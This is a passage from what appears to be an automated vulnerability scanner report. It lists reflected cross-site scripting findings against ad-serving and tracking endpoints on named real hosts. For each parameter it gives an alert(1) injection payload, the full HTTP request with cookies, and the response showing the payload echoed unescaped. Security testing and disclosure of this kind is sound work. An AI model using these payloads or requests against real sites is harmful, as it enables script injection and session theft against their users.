The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b2d8"-alert(1)-"096a80d911b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/10c/%2a/x%3B231651615%3B3-0%3B0%3B55718902%3B4252-336/280%3B39025852/39043609/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i
...[SNIP]...

4.90. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d70c0'-alert(1)-'8fa323c2db8 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19d70c0'-alert(1)-'8fa323c2db8&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 260
Date: Mon, 15 Nov 2010 07:20:22 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19d70c0'-alert(1)-'8fa323c2db8&mpvc="><img ismap border=0 src="http://img-cdn.medi
...[SNIP]...

4.91. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c62'%3balert(1)//0a40d0aebfa was submitted in the mpvc parameter. This input was echoed as 88c62';alert(1)//0a40d0aebfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19&mpvc=88c62'%3balert(1)//0a40d0aebfa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 254
Date: Mon, 15 Nov 2010 07:20:24 GMT

document.write('<a target="_blank" href="88c62';alert(1)//0a40d0aebfahttp://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

4.92. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158b3'%3balert(1)//1fd61cf7f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 158b3';alert(1)//1fd61cf7f60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19&mpvc=&158b3'%3balert(1)//1fd61cf7f60=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 257
Date: Mon, 15 Nov 2010 07:20:27 GMT

document.write('<a target="_blank" href="&158b3';alert(1)//1fd61cf7f60=1http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediapl
...[SNIP]...

4.93. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db8f3'-alert(1)-'7aa45b5fe58 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19db8f3'-alert(1)-'7aa45b5fe58&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 6:11:45 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 259
Date: Mon, 15 Nov 2010 07:20:22 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19db8f3'-alert(1)-'7aa45b5fe58&mpvc="><img ismap border=0 src="http://img-cdn.medi
...[SNIP]...

4.94. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f3e'%3balert(1)//2351d3570d4 was submitted in the mpvc parameter. This input was echoed as b0f3e';alert(1)//2351d3570d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19&mpvc=b0f3e'%3balert(1)//2351d3570d4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 5:06:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 253
Date: Mon, 15 Nov 2010 07:20:25 GMT

document.write('<a target="_blank" href="b0f3e';alert(1)//2351d3570d4http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

4.95. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7282'%3balert(1)//dabb31c2c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7282';alert(1)//dabb31c2c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19&mpvc=&d7282'%3balert(1)//dabb31c2c87=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 6:41:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 256
Date: Mon, 15 Nov 2010 07:20:26 GMT

document.write('<a target="_blank" href="&d7282';alert(1)//dabb31c2c87=1http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediapl
...[SNIP]...

4.96. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f00d"-alert(1)-"9ba223d4dfb was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?mpt=2010.11.15.07.15.419f00d"-alert(1)-"9ba223d4dfb&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:44 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4273
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?mpt=2010.11.15.07.15.419f00d"-alert(1)-"9ba223d4dfb\" target=\"_blank\">
...[SNIP]...

4.97. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 621f8"%3balert(1)//eb4cfdb33af was submitted in the mpvc parameter. This input was echoed as 621f8";alert(1)//eb4cfdb33af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?mpt=2010.11.15.07.15.41&mpvc=621f8"%3balert(1)//eb4cfdb33af HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:55 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "5fc76e-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=621f8";alert(1)//eb4cfdb33afhttp://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&clickTag=621f8";alert(1)//eb4cfdb33afhttp://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.1
...[SNIP]...

4.98. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bfdd"-alert(1)-"59ecd8958d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mojo2=12109:16388/9966:3945; mojo1=s/47634/10; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; svid=804356890302;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 11:19:34 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "5fc76e-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4091
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<mpvc/>http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1\" target=\"_blank\">
...[SNIP]...

4.99. http://app.insightgrit.com/Visit.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22f5"%3balert(1)//f53e72d2858 was submitted in the cid parameter. This input was echoed as c22f5";alert(1)//f53e72d2858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234c22f5"%3balert(1)//f53e72d2858&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b9828d75a1f6c563c9b9161d81f0a25a; path=/
Set-Cookie: IG84196=84196%3A%3Ab9828d75a1f6c563c9b9161d81f0a25a%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLin
...[SNIP]...
('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Google&cta=Webmetrics Trial&pf=Webmetrics&cid=1234c22f5";alert(1)//f53e72d2858&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("http://www.webmetrics.com/landingpage/Mon_goo
...[SNIP]...

4.100. http://app.insightgrit.com/Visit.php [cta parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the cta request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248b0"%3balert(1)//90365561f2b was submitted in the cta parameter. This input was echoed as 248b0";alert(1)//90365561f2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial248b0"%3balert(1)//90365561f2b&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d8b92fbdd47650d83f91811bc30e7132; path=/
Set-Cookie: IG84196=84196%3A%3Ad8b92fbdd47650d83f91811bc30e7132%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:03 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLin
...[SNIP]...
document.createElement('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Google&cta=Webmetrics Trial248b0";alert(1)//90365561f2b&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("http://www.webmetrics.
...[SNIP]...

4.101. http://app.insightgrit.com/Visit.php [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef2"%3balert(1)//26cf77cb37d was submitted in the kw parameter. This input was echoed as 5bef2";alert(1)//26cf77cb37d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing5bef2"%3balert(1)//26cf77cb37d&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=02f1d3d5df626107f402d4c973507e41; path=/
Set-Cookie: IG84196=84196%3A%3A02f1d3d5df626107f402d4c973507e41%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:01 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLink = document.createElement('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing5bef2";alert(1)//26cf77cb37d&lsd=Google&cta=Webmetrics Trial&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location
...[SNIP]...

4.102. http://app.insightgrit.com/Visit.php [lsd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the lsd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdf8"%3balert(1)//c8bc67fd179 was submitted in the lsd parameter. This input was echoed as cbdf8";alert(1)//c8bc67fd179 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Googlecbdf8"%3balert(1)//c8bc67fd179&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=261d3b1eb577eedbf319cb38751a65ba; path=/
Set-Cookie: IG84196=84196%3A%3A261d3b1eb577eedbf319cb38751a65ba%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLink = document.createElement('a');
